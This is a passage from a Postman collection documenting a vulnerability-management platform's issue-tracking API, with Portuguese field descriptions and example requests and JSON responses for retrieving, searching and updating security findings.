\"severity\": 2,\n            \"type\": \"VULNERABILITY\",\n            \"vulnerability\": {\n                \"status\": \"PENDING\",\n                \"host\": {\n                    \"protocol\": \"tcp\"\n                },\n                \"app\": {}\n            },\n            \"control\": {},\n            \"baseline\": {},\n            \"phishing\": {},\n            \"issue_id\": \"628670ab0d85567d25e673df\",\n            \"kb_id\": \"628670ab0d85567cbc2e7a73\",\n            \"asset_id\": \"6283c8e00d855679726d4f83\",\n            \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n            \"creation_date\": \"2022-05-19T13:30:35\",\n            \"last_seen_date\": \"2022-05-19T13:30:35\",\n            \"source_scan\": \"GATAPI\",\n            \"base_status\": \"OPEN\",\n            \"data_breach\": {}\n        }\n],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"offset\": 0,\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"last\": false,\n    \"totalPages\": 1,\n    \"totalElements\": 2,\n    \"number\": 0,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"size\": 30,\n    \"first\": true,\n    \"numberOfElements\": 2\n}"}],"_postman_id":"9d5e7e1f-6b70-4d43-b601-244858215524"},{"name":"Issue by ID","id":"839eb484-33a9-4918-8215-9fa7adc72f7e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"url":"https://<instance>/api/v2/issues/<issue_id>","description":"<p>Este endpoint permite que você recupere um Apontamento, especificando seu ID. Se não houver nenhum Apontamento com o ID especificado, o servidor irá responder com um 204: No Content.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues","<issue_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"8f79dee0-1004-4568-84ba-97a9073363fa","name":"Retornando um Apontamento","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"url":"https://instance/api/v2/issues/628672c40d85567d25f1b67f"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Definir a Gestão dos Ativos de Informação\",\n    \"severity\": 2,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"PENDING\",\n        \"confidentiality\": \"NONE\",\n        \"integrity\": \"NA\",\n        \"host\": {\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {}\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"628672c40d85567d25f1b67f\",\n    \"id_gat_detail\": 2685,\n    \"kb_id\": \"628672c30d85567cbc2e7a75\",\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-19T13:39:32\",\n    \"last_seen_date\": \"2022-05-19T13:39:32\",\n    \"responsible_id\": \"627e75840d855616e1399729\",\n    \"source_scan\": \"GATAPI\",\n    \"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"},{"id":"08425352-c269-459f-80b0-d5a006cb4d17","name":"Issue ID não encontrado","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"url":"https://instance/api/v2/issues/628672c40d85564d25f1b67f"},"status":"Not Found","code":404,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Issue not found.\",\n    \"message\": \"Issue not found.\"\n}"}],"_postman_id":"839eb484-33a9-4918-8215-9fa7adc72f7e"},{"name":"Search Issue with given filter","id":"31912ce9-fc97-4d50-a92c-d6da6a4a3257","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"kb_id","value":"List<String>","description":"<p>Lista de Kb IDs.</p>\n","type":"text"},{"key":"issue_id","value":"List<String>","description":"<p>Lista de IDs de Issues.</p>\n","type":"text"},{"key":"id_gat_detail","value":"List<Int>","description":"<p>List of GAT IDs.</p>\n","type":"text"},{"key":"title","value":"List<String>","description":"<p>Lista de Títulos.</p>\n","type":"text"},{"key":"asset_id","value":"List<String>","description":"<p>Lista de IDs de Ativos.</p>\n","type":"text"},{"key":"asset_group_id","value":"List<String>","description":"<p>Lista de IDs de Grupos de Ativos.</p>\n","type":"text"},{"key":"severity","value":"List<Integer>","description":"<p>Severidade do Apontamento. Valor dentre 0 e 4.</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>Lista de Tags.</p>\n","type":"text"},{"key":"type","value":"List<String>","description":"<p>\"VULNERABILITY\", \"CONTROL\", \"BASELINE\", \"DATA_BREACH\", \"PHISHING\", \"INCIDENT\".</p>\n","type":"text"},{"key":"framework","value":"Object","description":"<p>Objeto contendo \"name\" e \"items\".</p>\n","type":"text"},{"key":"framework.name","value":"List<String>","description":"<p>Lista de Nomes.</p>\n","type":"text"},{"key":"framework.items","value":"List<String>","description":"<p>Lista de Itens.</p>\n","type":"text"},{"key":"score","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"score.values","value":"List<Float>","description":"<p>Lista contendo 1 ou 2 valores, dependendo da operação..</p>\n","type":"text"},{"key":"score.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"recommendation_id","value":"List<String>","description":"<p>Lista de IDs de Recomendações.</p>\n","type":"text"},{"key":"mitigation_id","value":"List<String>","description":"<p>Lista de IDs de Mitigações.</p>\n","type":"text"},{"key":"test_id","value":"List<String>","description":"<p>Lista de IDs de Testes.</p>\n","type":"text"},{"key":"category_id","value":"List<String>","description":"<p>Lista de IDs de Categorias.</p>\n","type":"text"},{"key":"root_cause_id","value":"List<String>","description":"<p>Lista de IDs de Causas Raíz.</p>\n","type":"text"},{"key":"creation_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"creation_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"creation_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"last_seen_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"last_seen_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"due_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"due_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"due_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"update_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"update_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"update_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"close_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"close_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"close_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"responsible_id","value":"List<String>","description":"<p>Lista de IDs de Responsáveis.</p>\n","type":"text"},{"key":"watcher_id","value":"List<String>","description":"<p>Lista de IDs de Watchers.</p>\n","type":"text"},{"key":"source_scan","value":"List<String>","description":"<p>\"MANUAL\", \"NESSUS\", \"ACUNETIX\", \"ARACHNI\", \"QUALYS\", \"CUSTOM_PARSER\", \"NESSUS_AUDIT\", \"TENABLEIO\", \"NEXPOSE\", \"OPENVAS\", \"FORTIFY\", \"LUCY\", \"BURP\", \"APPSCAN\", \"NETSPAKER\", \"NIKTO\", \"WEBINSPECT\", \"W3AF\", \"LEGACY\", \"NMAP\", \"HIBP\", \"GAT\", \"GATAPI\", \"PHISHX\", \"GOPHISH\", \"IBLISS\", \"GAT_DISCOVERY\", \"GAT_SCAN\", \"ALIENVAULT\".</p>\n","type":"text"},{"key":"project_id","value":"List<String>","description":"<p>Lista de IDs de Projetos.</p>\n","type":"text"},{"key":"base_stauts","value":"List<String>","description":"<p>\"OPEN\", \"CLOSE\", \"NONE\".</p>\n","type":"text"},{"key":"service_desk","value":"Object","description":"<p>Objeto conténdo \"service_desk_tool\" e \"ticket_key\".</p>\n","type":"text"},{"key":"service_desk.service_desk_tool","value":"List<String>","description":"<p>\"JIRA\".</p>\n","type":"text"},{"key":"service_desk.ticket_key","value":"List<String>","description":"<p>Lista de Chaves de Tickets.</p>\n","type":"text"},{"key":"vulnerability","value":"Object","description":"<p>Objeto de Vulnerabilidade. Contém os parâmetros listados.</p>\n","type":"text"},{"key":"vulnerability.status","value":"List<String>","description":"<p>\"NONEXISTENT\", \"NOT_EXECUTED\", \"FIXED\", \"ACCEPT\", \"RETEST\", \"TREATMENT\", \"REOPENED\", \"PENDING\".</p>\n","type":"text"},{"key":"vulnerability.impact","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.impact.values","value":"List<Float>","description":"<p>Lista contendo 1 ou 2 valores, dependendo da operação.</p>\n","type":"text"},{"key":"vulnerability.impact.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.probability","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.probability.values","value":"List<Float>","description":"<p>Lista contendo 1 ou 2 valores, dependendo da operação.</p>\n","type":"text"},{"key":"vulnerability.probability.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.confidentiality","value":"List<String>","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n","type":"text"},{"key":"vulnerability.integrit","value":"List<String>","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n","type":"text"},{"key":"vulnerability.availability","value":"List<String>","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n","type":"text"},{"key":"vulnerability.attack_vector","value":"List<String>","description":"<p>\"NA\", \"PHYSICAL_ACCESS\", \"LOCAL_ACCESS\", \"ADJACENT_NETWORK\", \"LOCAL_NETWORK\".</p>\n","type":"text"},{"key":"vulnerability.attack_complexity","value":"List<String>","description":"<p>\"NA\", \"LOW\", \"HIGH\".</p>\n","type":"text"},{"key":"vulnerability.privileges_required","value":"List<String>","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n","type":"text"},{"key":"vulnerability.user_interaction","value":"List<String>","description":"<p>\"NONE\", \"REQUIRED\".</p>\n","type":"text"},{"key":"vulnerability.cvss_score","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.cvss_score.values","value":"List<Float>","description":"<p>Lista contendo 1 ou 2 valores, dependendo da operação.</p>\n","type":"text"},{"key":"vulnerability.cvss_score.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.cves","value":"List<String>","description":"<p>Lista de CVEs.</p>\n","type":"text"},{"key":"vulnerability.cwes","value":"List<String>","description":"<p>Lista de CWEs.</p>\n","type":"text"},{"key":"vulnerability.exploits","value":"Object","description":"<p>Objeto de Exploit. Cotém os parâmetros listados.</p>\n","type":"text"},{"key":"vulnerability.exploits.name","value":"List<String>","description":"<p>Lista de Nomes.</p>\n","type":"text"},{"key":"vulnerability.exploits.date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.exploits.date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"vulnerability.exploits.date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.exploits.verified","value":"Boolean","description":"<p>Valor Booleano. Indica se foi Verificado.</p>\n","type":"text"},{"key":"vulnerability.zero_day","value":"Boolean","description":"<p>Valor Booleano. Indica se é o dia zero da vulnerabilidade.</p>\n","type":"text"},{"key":"vulnerability.products","value":"Object","description":"<p>Objeto de Produtos. Contém os parâmetros listados.</p>\n","type":"text"},{"key":"vulnerability.products.vendor","value":"List<String>","description":"<p>Lista de Fornecedores.</p>\n","type":"text"},{"key":"vulnerability.products.name","value":"List<String>","description":"<p>Lista de Nomes de Produtos.</p>\n","type":"text"},{"key":"vulnerability.products.version","value":"List<String>","description":"<p>Lista de Versões de Produtos.</p>\n","type":"text"},{"key":"vulnerability.patch_available","value":"Object","description":"<p>Objeto de Patchs Disponíveis. Contém os parâmetros listados.</p>\n","type":"text"},{"key":"vulnerability.patch_available.name","value":"List<String>","description":"<p>Lista dos nomes de Patches disponíveis.</p>\n","type":"text"},{"key":"vulnerability.patch_available.apply_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.patch_available.apply_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"vulnerability.patch_available.apply_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.patch_available.applied","value":"Boolean","description":"<p>Valor Booleano. Indica se o Patch disponível foi aplicado</p>\n","type":"text"},{"key":"vulnerability.patch_available.release_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"vulnerability.patch_available.release_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"vulnerability.patch_available.release_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"vulnerability.host","value":"Object","description":"<p>Objeto de Host. Contém \"port\", \"protocol\" e \"serivce\".</p>\n","type":"text"},{"key":"vulnerability.host.port","value":"List<Integer>","description":"<p>Lista de Portas.</p>\n","type":"text"},{"key":"vulnerability.host.protocol","value":"List<String>","description":"<p>Lista de Protocolos.</p>\n","type":"text"},{"key":"vulnerability.host.service","value":"List<String>","description":"<p>Lista de Serviços.</p>\n","type":"text"},{"key":"vulnerability.app","value":"Object","description":"<p>Objeto de App. Contém \"httpMethod\", \"path\" e \"parameter\".</p>\n","type":"text"},{"key":"vulnerability.app.httpMethod","value":"List<String>","description":"<p>\"GET\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\", \"OPTIONS\", \"TRACE\", \"NA\", \"NE\".</p>\n","type":"text"},{"key":"vulnerability.app.path","value":"List<String>","description":"<p>Lista de Paths.</p>\n","type":"text"},{"key":"vulnerability.app.parameter","value":"List<String>","description":"<p>Lista de Parâmetros.</p>\n","type":"text"},{"key":"vulnerability.exploit_available","value":"Boolean","description":"<p>Valor Booleano. Indica se há exploits disponíveis.</p>\n","type":"text"},{"key":"control","value":"Object","description":"<p>Objeto de Controle. Contém \"status\" e \"approved\".</p>\n","type":"text"},{"key":"control.status","value":"List<String>","description":"<p>\"IMPLEMENTED\", \"NOT_IMPLEMENTED\", \"NOT_SURE\", \"NOT_APPLICABLE\".</p>\n","type":"text"},{"key":"control.approved","value":"Boolean","description":"<p>Valor Booleano. Indica se Controle foi aprovado.</p>\n","type":"text"},{"key":"baseline","value":"Object","description":"<p>Objeto de Baseline. Contém os parâmetros listados.</p>\n","type":"text"},{"key":"baseline.audit_name","value":"List<String>","description":"<p>Lista de Audit Names.</p>\n","type":"text"},{"key":"baseline.check_id","value":"List<String>","description":"<p>Lista de Check IDs.</p>\n","type":"text"},{"key":"baseline.check_value","value":"List<String>","description":"<p>Lista de Check Values.</p>\n","type":"text"},{"key":"baseline.status","value":"List<String>","description":"<p>\"PASSED\", \"ERROR\", \"FAILED\", \"WARNING\".</p>\n","type":"text"},{"key":"data_breach","value":"Object","description":"<p>Objeto de Violação de Dados.</p>\n","type":"text"},{"key":"data_breach.domain","value":"List<String>","description":"<p>Lista de Domínios.</p>\n","type":"text"},{"key":"data_breach.paste_url","value":"List<String>","description":"<p>Lista de URLs</p>\n","type":"text"},{"key":"data_breach.breach_date","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"data_breach.breach_date.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"data_breach.breach_date.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"data_breach.verified","value":"Boolean","description":"<p>Valor Booleano. Indica se violação de dados foi verificada.</p>\n","type":"text"},{"key":"phishing","value":"Object","description":"<p>Objeto de Phishing. Contém os parâmetros listados.</p>\n","type":"text"},{"key":"phishing.status","value":"List<String>","description":"<p>\"PHISHED\", \"PARTIALLY_PHISED\", \"NOT_PHISHED\", \"NOT_REACHED\", \"AWARE\".</p>\n","type":"text"},{"key":"phishing.viewed","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi visualizado.</p>\n","type":"text"},{"key":"phishing.clicked","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi clicado.</p>\n","type":"text"},{"key":"phishing.downloaded","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi baixado.</p>\n","type":"text"},{"key":"phishing.executed","value":"Boolean","description":"<p>Valor Booleano. Indica se o Phishing foi executado.</p>\n","type":"text"},{"key":"phishing.viewed_at","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"phishing.viewed_at.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.viewed_at.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"phishing.clicked_at","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"phishing.clicked_at.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.clicked_at.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"phishing.downloaded_at","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"phishing.downloaded_at.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.downloaded_at.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"phishing.executed_at","value":"Object","description":"<p>Objeto contendo \"values\" e \"operator\".</p>\n","type":"text"},{"key":"phishing.executed_at.values","value":"List<String>","description":"<p>Lista contendo 1 ou 2 datas, dependendo da operação. O formato da data é: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"phishing.executed_at.operator","value":"List<String>","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", or \"btw\" (between).</p>\n","type":"text"},{"key":"phishing.campaign_name","value":"List<String>","description":"<p>Lista de Campaign Names</p>\n","type":"text"},{"key":"risk_id","value":"List<String>","description":"<p>Lista de Risk IDs</p>\n","type":"text"}]},"url":"https://<instance>/api/v2/issues?size=30&page=0","description":"<p>Este endpoint permite que você busque por Apontamentos, baseado em filtros dados. Os Campos são combinados com o operador <strong>OR</strong>.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues"],"host":["<instance>"],"query":[{"description":{"content":"<p>[Optional] Quantos resultados você quer. Padrão são 30. Máximo são 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[Optional] Qual página você deseja recuperar</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"3bb45d5d-6da0-4893-bfef-311bfb89a845","name":"Malformed Request Body","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"severity\" : 3\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://instance/api/v2/issues?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v2","issues"],"query":[{"key":"size","value":"30","description":"[Optional] Quantos resultados você quer. Padrão são 30. Máximo são 200"},{"key":"page","value":"0","description":"[Optional] Qual página você deseja recuperar"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Malformed request body\"\n}"},{"id":"4f6b4101-341e-4fa1-94a2-904e076edd39","name":"Nenhum Resultado Encontrado","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"severity\": [\n        3, 4\n    ],\n    \"type\": [\n        \"VULNERABILITY\", \"PHISHING\"\n    ],\n\t\"creation_date\": {\n\t\t\"operator\": \"btw\",\n\t\t\"values\": [\"2019-06-01T00:00:00\", \"2021-06-30T23:59:59\"]\n\t}\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://instance/api/v2/issues?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v2","issues"],"query":[{"key":"size","value":"30","description":"[Optional] Quantos resultados você quer. Padrão são 30. Máximo são 200"},{"key":"page","value":"0","description":"[Optional] Qual página você deseja recuperar"}]}},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"2a1d709d-b55d-4d29-93af-74767a70983e","name":"Pesquisa Realizada com Sucesso","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"type\": [\n        \"VULNERABILITY\"\n    ],\n    \"severity\": [\n        1\n    ],\n    \"vulnerability\": {\n        \"host\": {\n            \"port\": [\n                25565\n            ]\n        }\n    }\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://instance/api/v2/issues?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v2","issues"],"query":[{"key":"size","value":"30","description":"[Optional] Quantos resultados você quer. Padrão são 30. Máximo são 200"},{"key":"page","value":"0","description":"[Optional] Qual página você deseja recuperar"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"language\": \"en\",\n            \"title\": \"Unix Operating System Unsupported Version Detection\",\n            \"severity\": 1,\n            \"type\": \"VULNERABILITY\",\n            \"vulnerability\": {\n                \"status\": \"PENDING\",\n                \"host\": {\n                    \"protocol\": \"tcp\"\n                },\n                \"app\": {},\n                \"cvss_score\": 9.7,\n                \"exploit_available\": true\n            },\n            \"control\": {},\n            \"baseline\": {},\n            \"phishing\": {},\n            \"issue_id\": \"6287d0d90d85563c65db1598\",\n            \"kb_id\": \"6287d0d90d85563be60f5b86\",\n            \"asset_id\": \"6283c8e00d855679726d4f83\",\n            \"id_gat_detail\": 2685,\n            \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n            \"creation_date\": \"2022-05-20T14:33:13\",\n            \"last_seen_date\": \"2022-05-20T14:33:13\",\n            \"source_scan\": \"GATAPI\",\n            \"base_status\": \"OPEN\",\n            \"data_breach\": {}\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"offset\": 0,\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"last\": true,\n    \"totalPages\": 1,\n    \"totalElements\": 1,\n    \"number\": 0,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"size\": 30,\n    \"first\": true,\n    \"numberOfElements\": 1\n}"}],"_postman_id":"31912ce9-fc97-4d50-a92c-d6da6a4a3257"},{"name":"Update an Issue","id":"835ad5f7-b68e-4db3-b8ec-0d2f6d983747","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"title","value":"String","type":"text","description":"<p>Título.</p>\n"},{"key":"description","value":"String","type":"text","description":"<p>Descrição.</p>\n"},{"key":"severity","value":"Integer","type":"text","description":"<p>Severidade do Apontamento. </p>\n"},{"key":"tags","value":"List<String>","type":"text","description":"<p>Lista de Tags.</p>\n"},{"key":"frameworks","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Frameworks.</p>\n"},{"key":"frameworks.name","value":"List<String>","type":"text","description":"<p>Lista de Nomes.</p>\n"},{"key":"frameworks.items","value":"List<String>","type":"text","description":"<p>Lista de Itens.</p>\n"},{"key":"score","value":"Float","type":"text","description":"<p>Pontuação.</p>\n"},{"key":"recommendation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Recomendações.</p>\n"},{"key":"mitigation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Mitigações.</p>\n"},{"key":"test_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Testes.</p>\n"},{"key":"category_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Categorias.</p>\n"},{"key":"root_cause_id","value":"String","type":"text","description":"<p>ID de Causa Raíz.</p>\n"},{"key":"creation_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"due_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"responsible_id","value":"String","type":"text","description":"<p>ID de Responsável.</p>\n"},{"key":"watcher_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Watchers.</p>\n"},{"key":"references","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Referências.</p>\n"},{"key":"references.url","value":"String","type":"text","description":"<p>URL de Referência.</p>\n"},{"key":"references.title","value":"String","type":"text","description":"<p>Título de Referência.</p>\n"},{"key":"comment","value":"String","type":"text","description":"<p>Comentário.</p>\n"},{"key":"links","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Links.</p>\n"},{"key":"link.linked_issue_id","value":"String","type":"text","description":"<p>ID do Apontamento 